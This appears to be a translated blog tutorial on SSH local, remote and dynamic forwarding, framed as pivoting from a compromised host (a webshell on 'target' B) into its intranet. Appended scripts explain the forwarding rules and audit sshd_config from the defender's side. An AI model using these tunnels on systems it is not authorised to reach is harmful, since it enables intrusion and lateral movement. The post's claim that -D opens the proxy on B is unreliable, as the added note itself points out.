OpenSSH Advanced Techniques

Four weeks behind. Let me post one update first. The past three weeks went into transplanting Kali NetHunter onto what Yu Xian called the “hacking phone” [Slant Eye], and I stepped on too many pitfalls along the way. Writing it up should make up for the missing weeks…

Back to business. To be honest, there is no shortage of online tutorials on advanced ssh usage, but unfortunately they are written by science-minded people whose thinking I really can’t follow. For example, for the difference between local forwarding and remote forwarding, I have to Google a tutorial every time I use forwarding and read it for a long time every time. It’s really annoying. This article tries to shift the focus away from the various ssh commands and parameters, concentrate on the specific network environment, and discuss how to use this powerful tool, ssh, to connect to any host easily in different bad network environments.

In all the examples below, machine A is our little hacker (A for ahahaha) and machine B is our target (B for bazi). We want to get things on machine B (or in the network B sits in) from A: connect to a shell on B, or forward a port on B. Where a relay is needed I will use machine P (P for proxy).

Port forwarding is a very powerful ssh feature, and it is also essential when we do bad things. For example, Bazi has a MySQL database bound to a port that can only be accessed locally on Bazi, and we want to scan it with a tool. Should we copy our scanning tool over to Bazi and run it there, or forward the port to our machine A and run the tool from there? The usefulness of forwarding is self-evident.

Two-way connectable network penetration

Two-way connectable means that A and B can each initiate TCP connections to the other (the concepts of forward and reverse connection are not discussed here). In the following situations an ssh connection can be initiated from either side.

  • A and B can ping each other (both have public IPs or are on the same LAN, with no firewall in between)
  • A and B cannot ping each other because they sit behind routers, but the router kindly forwards ports to the machine (NAT in between, but two or more ports reachable)

Both situations come with restrictions ~~(so ideal network environments are rare, which is why this tutorial is needed hahaha)~~. Scenario 2 needs two ports forwarded by the router because, besides the port we want to forward, sshd also needs its own port to listen for ssh connections. Of course, if you don’t want to forward anything and just want a shell, one port is enough. If there is no port at all, there is nothing to work with!

These two network situations are the best for us, because we can connect the two machines using any method in this article. Let’s start with the simplest: connecting to a shell is always just ssh hostB, nothing more. So let’s just talk about port forwarding.

Forward the entire network segment

The most powerful approach, usable in the most ideal situation, is to open a network proxy on B (ssh calls this dynamic port forwarding). This way A can access every machine in B’s network from B’s point of view, that is, real network penetration, instead of forwarding one machine and one port at a time, which greatly improves attack efficiency.

The following command opens a socks proxy on port 1080 of Bazi (socks4 and socks5 are both supported). If there is NAT in between, this port 1080 is the second port the router needs to forward, because we want to connect to it.

ssh -D 1080 hostB

If we want to use some shy little tool, just set hostB:1080 as the proxy server in that tool~

forward a port

Connecting from hostA (local forwarding, i.e. forwarding to the local side) binds hostA:6666 to localhost:3306 on hostB:

ssh -L 6666:localhost:3306 hostB

Connecting from hostB (remote forwarding, i.e. forwarding to the remote side) has the same effect. This works when we have a webshell on B but not B’s ssh password. As mentioned below, when A wants something from B but B is the one connecting to A, this is called a reverse connection.

ssh -R 6666:localhost:3306 hostA

The above two commands only need the ssh port to be accessible, no second port is required.

Networks that allow only one-way connections

The scenario of a one-way connection is:

  • A or B is behind a router (NAT), and nobody kindly set up port forwarding
  • A firewall (such as iptables rules or a cloud provider’s security policy) blocks incoming connections

In this case dynamic forwarding is out of the question. Normally our B is well protected by a firewall, so here we assume we already have a webshell or some other way to run commands; naturally we can only do anything else once we have that access…

Suppose we have already tried hostB’s localhost and want to do something else. Now we find in hostB’s command-line history that it has connected to hostSB.local on the intranet; we run a remote command (echo) and confirm it is reachable. We want to forward hostSB, since a webshell is not interactive. We can:

ssh -R 6666:hostsb.local:22 hostA

Now connecting to hostA:6666 is equivalent to hostSB:22. Likewise, if we can only connect from A to B, refer to the method above and just use ssh -L to forward it locally.

I am a little hacker! no one can touch me

People’s hearts are not what they used to be and the world is cold. What if I am exposed and the network center comes knocking? So when we

  • connect to the internet through a proxy or VPN and cannot accept incoming connections
  • have both hostA and hostB behind NAT, facing each other

This is the case at our school. Although everyone can connect to the Wi-Fi, connections between clients are actively dropped by the firewall and only broadcasts barely get through. However, you can go through another machine in the school as a springboard, and for that you need a proxy.

through a proxy server

Connecting through a proxy is not really an ssh feature; another program, netcat, is needed to relay the traffic. The following command makes our connection to hostB go through hostP as a socks5 proxy:

ssh -o ProxyCommand='nc -x hostP:1080 %h %p' hostB

nc’s proxy mode supports HTTP CONNECT (add nc -X connect), socks4 (nc -X 4) or socks5 (the default, as above, or nc -X 5 explicitly).

via springboard machine with ssh

This situation is equivalent to hostP being reachable from both hostA and hostB. You only need to connect from hostB to hostP and forward your ssh port to the remote side, e.g. to hostP:6666; then connect from hostA to it and forward it with -R to hostA:2333, or just let hostA connect to hostP:6666 directly.

Advanced Usage & Notes

background forwarding, secretly

ssh -f forks the ssh process into the background so it does not block our shell. ssh -N opens no shell and only forwards.

SSH-based VPN

See the “SSH-BASED VIRTUAL PRIVATE NETWORKS” section of man ssh. ~~(I haven’t read it)~~ Requires root privileges. Routing and forwarding can be done; there is no need to open a proxy, only one port is needed, and it can pass through NAT. Works great with explosions.

Forwarded domain name resolution problem

Above we used ssh -R and ssh -L to forward localhost and hostsb.local respectively. There is actually a small catch here. When hostB runs ssh -R 6666:hostsb.local:22 hostA to forward to the remote side, it is hostB, that is, the localhost running the ssh command, that resolves hostsb.local to hostSB’s IP! If it is turned around as above and hostA runs ssh -L 6666:hostsb.local:22 hostB, then hostA is obviously not in hostB’s network and has no idea what hostsb.local is; therefore, with ssh -L forwarding to the local side, it is the remote host accepting the ssh connection that resolves the forwarded domain name! In some environments this makes a huge difference. If an IDS and honeypots are deployed in hostB’s environment and we use it as a springboard to attack other networks, the name they resolve for us may lead straight into a trap, and then hehehehe.
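To make the -L / -R / -D rules from the forwarding sections and the resolution point above concrete, here is an added example (not from the original post) in POSIX shell: given the forwarding option as typed, it reports which machine listens, which machine resolves the destination name, and where the traffic exits, following ssh(1). The host names hostA, hostB, hostP and hostsb.local are the post’s placeholders; the script assumes no bracketed IPv6 literals in the spec. One caveat worth knowing from ssh(1): -D allocates its listening socket on the local (client) side, so the SOCKS port lives on whichever machine typed the command.

```shell
#!/bin/sh
# Added example (not from the original post): for an ssh forwarding option
# as typed on the command line, report which machine ends up listening,
# which machine resolves the destination name, and where the traffic
# exits. Rules follow ssh(1): with -L the client listens and the server
# connects to host:hostport; with -R the server listens and the client
# connects to host:hostport; with -D the client opens a SOCKS listener and
# the server makes every outbound connection. Host names are the post's
# placeholders. Assumption: no bracketed IPv6 literals in SPEC.

# forward_plan CLIENT SERVER MODE SPEC
#   CLIENT  machine running the ssh command
#   SERVER  machine running sshd (the ssh target)
#   MODE    L, R or D
#   SPEC    [bind_address:]port:host:hostport  for L and R
#           [bind_address:]port                for D
# Prints: listener=<who>(<bind>:<port>) resolver=<who> dest=<host:hostport>
forward_plan() {
  client=$1; server=$2; mode=$3; spec=$4
  case $mode in
    D)
      case $spec in
        *:*) bind=${spec%:*}; port=${spec##*:} ;;
        *)   bind=localhost;  port=$spec ;;       # ssh defaults to loopback
      esac
      printf 'listener=%s(%s:%s) resolver=%s dest=%s\n' \
        "$client" "$bind" "$port" "$server" "chosen-by-socks-client"
      ;;
    L|R)
      case $spec in
        *:*:*) ;;
        *) printf 'bad spec: %s\n' "$spec" >&2; return 1 ;;
      esac
      hostport=${spec##*:}          # strip from the right: hostport ...
      rest=${spec%:*}
      host=${rest##*:}              # ... then host ...
      rest=${rest%:*}               # ... leaving [bind_address:]port
      case $rest in
        *:*) bind=${rest%:*}; port=${rest##*:} ;;
        *)   bind=localhost;  port=$rest ;;
      esac
      if [ "$mode" = L ]; then
        listener=$client; resolver=$server   # -L: the sshd side resolves host
      else
        listener=$server; resolver=$client   # -R: the ssh client side resolves host
      fi
      printf 'listener=%s(%s:%s) resolver=%s dest=%s:%s\n' \
        "$listener" "$bind" "$port" "$resolver" "$host" "$hostport"
      ;;
    *) printf 'unknown mode: %s\n' "$mode" >&2; return 1 ;;
  esac
}

# Stand-alone run: the two commands the post contrasts, plus the SOCKS case.
if [ "${1:-}" = "--demo" ]; then
  forward_plan hostB hostA R 6666:hostsb.local:22   # typed on hostB
  forward_plan hostA hostB L 6666:hostsb.local:22   # typed on hostA
  forward_plan hostA hostB D 1080                   # typed on hostA
fi
```

Run it with `--demo` to see that both commands put the listener on hostA but swap which machine resolves hostsb.local, which is exactly the trap the paragraph above describes; the third line shows the -D listener landing on the client.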

Configuration issues for enabling forwarding

On the side that accepts the forwarded port in the ssh connection, port forwarding must be allowed in the system’s /etc/ssh/sshd_config. Otherwise the error administratively prohibited is reported. The default is any, everything allowed.

PermitOpen any
PermitOpen host:port
PermitOpen IPv4_addr:port
PermitOpen [IPv6_addr]:port
PermitOpen none

GatewayPorts in sshd_config controls whether the interface a forwarded port binds to may be changed: set to no, it can only bind to localhost; set to yes, it is forced to bind the given port on all network interfaces (the wildcard address); set to clientspecified, the optional bind_address in ssh -L [bind_address:]port:host:hostport or -R picks which IP to bind. See the ssh manpage for details. In short, if port forwarding like the last case above is needed, it is best not to leave it at no.

GatewayPorts no

Another parameter that articles ~~(especially Chinese ones!)~~ like to mention, PermitTunnel, is actually there to allow the ssh-based VPN mentioned above.
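From the defending side, the three sshd_config directives discussed in this section are what an administrator checks when deciding whether a host can be used as a forwarding springboard at all. The following added example (not from the original post) is a POSIX shell audit that reads an sshd_config file and reports the effective value of PermitOpen, GatewayPorts and PermitTunnel, plus AllowTcpForwarding, which sshd_config(5) documents but this post does not mention. Defaults are those of sshd_config(5); the sample config is constructed for the demonstration, and the script assumes plain “Key value” lines at global scope (no Match blocks, no “Key=value” syntax).

```shell
#!/bin/sh
# Added example (not from the original post): audit the forwarding-related
# directives of an sshd_config file from the server side. Defaults per
# sshd_config(5): AllowTcpForwarding yes, PermitOpen any, GatewayPorts no,
# PermitTunnel no. Assumption: plain "Key value" lines at global scope;
# Match blocks and "Key=value" syntax are not handled.

# effective_value FILE DIRECTIVE DEFAULT
# sshd honours the first occurrence of a directive, so stop at the first
# uncommented match; fall back to DEFAULT when the directive is absent.
effective_value() {
  file=$1; key=$2; default=$3
  val=$(awk -v k="$key" '
    /^[[:space:]]*#/ { next }                     # skip comment lines
    tolower($1) == tolower(k) {                   # keywords are case-insensitive
      sub(/^[[:space:]]*[^[:space:]]+[[:space:]]+/, "", $0)
      print $0; exit
    }' "$file")
  if [ -n "$val" ]; then printf '%s\n' "$val"; else printf '%s\n' "$default"; fi
}

# audit_forwarding FILE
# Prints one line per directive: "<Directive>=<value> <OK|NOTE|WARN>: <reason>".
# Exit status is the number of WARN lines (0 = nothing to flag).
audit_forwarding() {
  file=$1; warns=0
  tcp=$(effective_value "$file" AllowTcpForwarding yes)
  open=$(effective_value "$file" PermitOpen any)
  gw=$(effective_value "$file" GatewayPorts no)
  tun=$(effective_value "$file" PermitTunnel no)

  case $tcp in
    no) echo "AllowTcpForwarding=$tcp OK: -L/-R/-D through this server are refused" ;;
    *)  echo "AllowTcpForwarding=$tcp NOTE: TCP forwarding enabled; PermitOpen decides destinations" ;;
  esac
  case $open in
    any)  echo "PermitOpen=$open WARN: clients may forward to any host:port reachable from this server"; warns=$((warns+1)) ;;
    none) echo "PermitOpen=$open OK: every -L destination is administratively prohibited" ;;
    *)    echo "PermitOpen=$open OK: forwarding restricted to the listed destinations" ;;
  esac
  case $gw in
    no) echo "GatewayPorts=$gw OK: -R listeners bind to loopback only" ;;
    *)  echo "GatewayPorts=$gw WARN: -R listeners may bind non-loopback addresses, exposing forwards to other machines"; warns=$((warns+1)) ;;
  esac
  case $tun in
    no) echo "PermitTunnel=$tun OK: tun-device (ssh VPN) forwarding disabled" ;;
    *)  echo "PermitTunnel=$tun WARN: tun-device (ssh VPN) forwarding enabled"; warns=$((warns+1)) ;;
  esac
  return $warns
}

# write_sample_config FILE: a constructed sshd_config fragment for the demo.
write_sample_config() {
  cat >"$1" <<'EOF'
# constructed sample, not a real host's config
Port 22
#PermitOpen none
PermitOpen any
GatewayPorts clientspecified
PermitTunnel no
EOF
}

# Stand-alone run: write the sample, audit it, show the warning count.
if [ "${1:-}" = "--demo" ]; then
  tmp=$(mktemp); write_sample_config "$tmp"
  audit_forwarding "$tmp"; echo "warnings: $?"
  rm -f "$tmp"
fi
```

On the constructed sample the commented-out PermitOpen none is correctly ignored, PermitOpen any and GatewayPorts clientspecified are flagged, and PermitTunnel no is reported as safe; point the function at /etc/ssh/sshd_config on a real bastion to get the same report for it.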